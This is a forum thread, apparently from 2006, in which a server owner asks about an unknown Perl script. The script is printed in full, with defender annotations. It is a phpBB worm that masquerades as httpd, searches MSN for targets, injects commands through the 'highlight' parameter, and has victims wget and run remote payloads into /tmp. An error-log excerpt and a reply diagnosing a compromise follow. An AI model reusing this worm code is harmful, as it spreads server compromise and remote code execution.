Unknown heavy Perl script running to get something

cttsite

Can anyone tell me what this is
and how to stop it?

thanks


Code:
use strict;
use IO::Socket;
use IO::Handle;


# Process-name masquerade: $0 is overwritten so the process lists as
# /usr/sbin/httpd in ps/top, NUL-padded to hide the real argv length.
# Defender note: an "httpd" whose /proc/<pid>/exe is the perl binary is
# the tell; this is what makes the process "heavy perl" in the title.
my $process = '/usr/sbin/httpd'; 
$0="$process"."\0"x16;;
# fork without using $pid: $pid is never read below, so parent and child
# both continue through the rest of the script.
my $pid=fork;


# Forward declarations with prototypes (prototypes alter parsing only,
# they do not validate arguments).
sub fetch();
sub remote($);       # declared here but no definition appears in the listing
sub http_query($);
sub encode($);

# fetch: harvests candidate targets from a search engine.
# Issues a randomised query against search.msn.com.br for pages whose
# title looks like a phpBB 2.0.x "View topic" page, then returns every
# http:// link from the result page (scheme stripped) except links back
# to msn, cache or hotmail. Returns a list of "host/path" strings.
# Defender note: outbound traffic from an "httpd" to search.msn.com.br
# with these query strings is an indicator of this worm.
sub fetch(){
    my $rnd=(int(rand(9999)));     # random token appended to the query
    my $s= (int(rand(1000)));      # random result offset ("first=")
    if ($rnd>1000) { $s= (int(rand(100)))}
 
    

    # Search terms: "View topic" plus a phpBB version string; one is
    # picked at random per call.
    my @str=(
             "%22View+topic%22+2.0.4+",
             "%22View+topic%22+2.0.5+",
	     "%22View+topic%22+2.0.6+",
	     "%22View+topic%22+2.0.7+",
             "%22View+topic%22+2.0.8+",
             "%22View+topic%22+2.0.9+",
             "%22View+topic%22+2.0.10+",
	     "%22View+topic%22+2.0.3+",
             "%22View+topic%22+2.0.2+", 

 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    # Pull the target of every http:// anchor out of the result HTML;
    # $1 holds everything after "http://" up to the closing quote or '>'.
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
    
    return (@lst);
}

# http_query: minimal raw-socket HTTP/1.0 GET.
# Takes a "host/path?query" string (an optional leading href="http://
# is stripped), connects to port 80 and returns the whole response
# (headers and body, lines joined by spaces) as one string, or "" on
# connect failure or on the 10-second alarm.
# Defender note: the request is HTTP/1.0 with bare "\n" line endings
# and User-Agent "Mozilla/4.0", which is how these probes appear in
# access logs.
sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;    # keep only the host part
    $query =~s/$host//;                      # remainder is the request path
    if ($query eq "") {$query="/";};
    eval {
        # SIGALRM turns into a die that the surrounding eval catches.
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        # "return" here leaves the eval block, not the sub: $page stays "".
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";      # interpolating the array joins lines with spaces
        alarm 0;
        close($sock);
    };    
    return $page;

}

# encode: rewrites a string as a quote-free expression.
# Every character becomes "chr(<ord>)" and the pieces are joined with
# %252E (a double-URL-encoded "."); the trailing separator is removed.
# Defender note: runs of "chr(NN)%252E" in a request query string are
# the signature of this worm's highlight-parameter injection and are
# easy to grep for in web server access logs.
sub encode($) {
    my $s = shift;
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
    $s =~ s/%252E$//;
    return $s;
}



# Daemonize: the parent exits and the child carries on (the eval only
# hides a fork failure).
eval {fork and exit;};

my $iam=$ARGV[0];          # first argument; never read in this listing
my $oneday=time+3600;      # despite the name, the loop runs for one hour
my $page="";
my @urls;
my $url;






# Main loop. For each harvested URL that contains viewtopic.php, send a
# probe through the phpBB "highlight" parameter; if the marker string
# comes back in the response, the target executed it, and two follow-up
# requests make it download and run further payloads.
# Defender indicators visible here: the marker jSVowMsd, the dropped
# files /tmp/.sql.err.3792 and /tmp/.sql.err.3913, the marker file
# /tmp/.doente, and the wget for linuxday.txt / linuxdaybot.txt. The
# "[url]...[/url]" around the wget targets is almost certainly forum
# BBCode introduced by the paste, not part of the script itself.
while(time<$oneday){
    @urls=fetch();
    foreach $url (@urls) {
	if ($url !~ /viewtopic.php/) {next;}
	# trim the URL down to viewtopic.php?t=N or ?p=N
	$url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
	# probe: prints the marker string if the injection executes
	my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
	$url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	$page = http_query($url);
	if ( $page =~ /jSVowMsd/ ){
	    $url =~ s/&highlight.*//;
	    my $upload=$url;             # computed but not used afterwards
	    $upload =~ s/viewtopic.*//;
	    # stage 1: fetch and run the first payload on the target
	    $cmd="wget [url]http://www.pivadesign.com.br/rc/linuxday.txt[/url] -O /tmp/.sql.err.3792 ;perl /tmp/.sql.err.3792";    # set cmd
	    $cmd=encode("$cmd");    # set cmd
	    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	    $page = http_query($url);
	    # stage 2: second payload plus an "infected" marker file
	    $cmd="wget [url]http://www.pivadesign.com.br/rc/linuxdaybot.txt[/url] -O /tmp/.sql.err.3913; perl /tmp/.sql.err.3913; touch /tmp/.doente";   
	    $cmd=encode("$cmd");    # set cmd
	    $url =~ s/&highlight.*//;
	    $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
	    $page = http_query($url);
	}

    }
}
 
httpd error log

Code:
HTTP request sent, awaiting response... [Thu Feb 23 23:40:39 2006] [error] [client 222.84.60.19] File does not exist: /var/www/html/tracker/tracker.php
200 OK
Length: 2,966 [text/plain]

    0K .[Thu Feb 23 23:40:39 2006] [error] [client 202.108.1.5] File does not exist: /var/www/html/bbs/forumdisplay.php
.                                                    100%    7.10 KB/s

23:40:39 (7.10 KB/s) - `/tmp/.sql.err.3792' saved [2,966/2,966]
 
This looks like the kind of thread I skip over because there's not enough information in it.

For example, you didn't say where that code came from, or its name, or the path you found it in.

However I'll answer because I did notice it does a WGET.

It's a system compromise.

Turn it off (chmod it 000), then figure out how it got on your server.

And read it so you'll know that it could have caused your system to be hosting WAREZ or other malware.

Jeff
 